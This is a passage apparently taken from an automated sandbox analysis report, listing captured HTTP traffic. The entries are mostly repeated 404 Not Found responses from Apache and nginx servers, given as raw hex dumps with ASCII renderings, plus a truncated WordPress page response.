2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:51:50 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:51:53 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:51:57 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:52:17 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:52:20 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:52:23 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:52:26 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 08 Dec 2023 13:52:32 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2023-12-08T13:52:37.4097576Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 08 Dec 2023 13:52:35 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2023-12-08T13:52:37.4097576Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 08 Dec 2023 13:52:38 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2023-12-08T13:52:43.0141623Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 08 Dec 2023 13:52:40 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2023-12-08T13:52:45.7508499Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:52:47 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:52:49 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:52:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:52:55 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:53:01 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4d 53 49 6e 70 75 74 